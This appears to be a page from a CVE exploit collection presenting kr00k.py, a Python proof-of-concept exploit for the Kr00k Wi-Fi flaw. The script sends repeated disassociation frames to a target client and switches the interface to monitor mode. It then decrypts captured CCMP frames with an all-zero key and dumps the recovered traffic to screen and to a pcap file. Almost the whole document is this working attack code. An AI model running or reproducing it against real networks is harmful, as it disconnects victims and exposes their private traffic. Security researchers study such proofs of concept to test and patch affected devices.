4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / kr00k.py PY
#!/usr/bin/python3

import sys, os, time, re, argparse, threading
from scapy.sendrecv     import sniff, sendp
from scapy.layers.dot11 import Dot11, RadioTap, Dot11CCMP, Dot11FCS
from scapy.all import *
from Crypto.Cipher import AES
from subprocess import run, PIPE

class KR00K:

    def __init__(self,arg):
        self.interface = arg.interface
        self.sta_mac = arg.victim
        self.quiet = arg.verbose
        self.ap_mac = arg.bssid
        self.dst_path = arg.write_to

    def INFO(self, string):
        print("\033[1;34m [*] " + string + " \033[0m")
    def ERROR(self, string):
        print("\033[1;31m [-] " + string + " \033[0m")
    def SUCCESS(self, string):
        print("\033[1;32m [+] " + string + " \033[0m")
    def WARNING(self, string):
        print("\033[1;33m [!] " + string + " \033[0m")
    def disassociation(self):
        """
        send disassociation packet to target 
        if not specified, randomly pick target from active session
        """
        count = 5
        while True:
            pkt = RadioTap() / Dot11(\
                addr1=self.sta_mac.lower(),\
                # client mac
                addr2=self.ap_mac.lower(),\
                # ap bssid
                addr3=self.ap_mac.lower()) / Dot11Disas()
            sendp(pkt, iface=self.interface, count=count, verbose=False)
            
            self.SUCCESS(str(count)+
                        ' disassociation packets sent to: '+ self.sta_mac+
                        ' from: '+ self.ap_mac )
            time.sleep(3)

    def decrypt(self, pkt):
        """
        try to decrypt traffic using all-zero tk
        """

        if pkt.haslayer(Dot11CCMP):
            try:
                qos = pkt[Dot11QoS]
                ccmp = pkt[Dot11CCMP]
                fcs = pkt[Dot11FCS]
                addr1 = re.sub(":","",pkt.addr1)
                addr2 = re.sub(":","",pkt.addr2)
                addr3 = re.sub(":","",pkt.addr3)
                # addr4 = re.sub(":","",fcs.addr4)
                PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(pkt.PN5,pkt.PN4,pkt.PN3,pkt.PN2,pkt.PN1,pkt.PN0)
                
                """
                AAD = ((bytes.fromhex(fcs.FCfield.value) + bytes.fromhex(addr1) + bytes.fromhex(addr2) \
                    + bytes.fromhex(addr3) + bytes.fromhex(fcs.SC) + bytes.fromhex(addr4) + bytes.fromhex(qos.TID))\
                    if not fcs.addr4 else \
                    (bytes.fromhex(fcs.FCfield.value) + bytes.fromhex(addr1) + bytes.fromhex(addr2) \
                    + bytes.fromhex(addr3) + bytes.fromhex(fcs.SC) + bytes.fromhex(qos.TID)))
                """

                # Priority Octet "00" 
                nonce = bytes.fromhex("00") + bytes.fromhex(addr2) + bytes.fromhex(PN)
                                
                TK = bytes.fromhex("00000000000000000000000000000000") #TK
                cipher_text = pkt.data[:-8]
                cipher = AES.new(TK, AES.MODE_CCM, nonce, mac_len=8)
                # cipher.update(AAD)
                plain_text = cipher.decrypt(cipher_text)
                assert plain_text.startswith(b'\xaa\xaa\x03'), "All-0 TK failed to decrypt"
                eth_header = bytes.fromhex(addr3 + addr2) + plain_text[6:8]
                packet = eth_header + plain_text[8:]
                self.SUCCESS("kr00k packet arrived !")

                if not self.quiet:
                    hexdump(packet)
                if self.dst_path:

                    wrpcap(self.dst_path, packet, append=True)


            except AssertionError:
                pass
                # self.WARNING("All-0 TK failed to decrypt this CCMP packet")
        else:
            pass
            # self.WARNING("Not 802.11 CCMP packet")

    def engage(self):

        t = threading.Thread(target=self.disassociation)
        t.daemon = True
        t.start()
        sniff(iface=self.interface, prn=self.decrypt)

    def read_cap(self, cap):

        self.INFO("Reading %s ......."%(cap))
        packets = rdpcap(cap)
        for packet in packets:
            self.decrypt(packet)
        
def main():

    try:
        parser = argparse.ArgumentParser()

        parser.add_argument('-i', '--interface'   , dest="interface", default=None, type=str)
        parser.add_argument('-t', '--target'      , dest="victim"   , default=None, type=str) # if not specified passive listen to all
        parser.add_argument('-v', '--verbose'     , dest="verbose"  , default=True, type=bool)
        parser.add_argument('-c', '--channel'     , dest="channel"  , default=1, type=int)
        parser.add_argument('-w', '--write'       , dest="write_to" , default=None, type=str)
        parser.add_argument('-r', '--read'        , dest="read"     , default=None, type=str)
        parser.add_argument('--bssid'             , dest="bssid"    , default=None, type=str)
        
        options = parser.parse_args()


        kr00k = KR00K(options)
    #    if os.getuid() != 0:
     #       kr00k.ERROR("please run as root")
      #      exit(0)
        kr00k.INFO("killing processes that could cause trouble. (airmon-ng check kill)")
        run(['airmon-ng check kill'], shell=True, stdout=PIPE)
        # interface_mode: CompletedProcess = run(['iwconfig ' + options.interface], shell=True, stdout=PIPE)
        kr00k.INFO("initiating monitor mode")
        run(['airmon-ng start ' + options.interface], shell=True, stdout=PIPE)
        kr00k.INFO("switching to specified channel")
        run(['iwconfig ' + options.interface + ' channel ' + str(options.channel)], shell=True, stdout=PIPE)
        kr00k.INFO("engaging")
        # spinner = spinning_cursor()
        # for _ in range(50):
        #     sys.stdout.write(next(spinner))
        #     sys.stdout.flush()
        #     time.sleep(0.1)
        #     sys.stdout.write('\b')
        if options.read!=None:
            kr00k.read_cap(options.read)
        else:
            kr00k.engage()


    except KeyboardInterrupt:
        print('Exit')
        exit(0)

def spinning_cursor():
    while True:
        for cursor in '|/-\\':
            yield '\033[1;34m'+cursor+"\033[0m"



def test():
    packets = rdpcap('WPA2-PSK-Final.cap')
    pkt = packets[483]
    ccmp = (pkt[Dot11CCMP])
    PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(ccmp.PN5,ccmp.PN4,ccmp.PN3,ccmp.PN2,ccmp.PN1,ccmp.PN0)



if __name__ == '__main__':
    main()
    # test()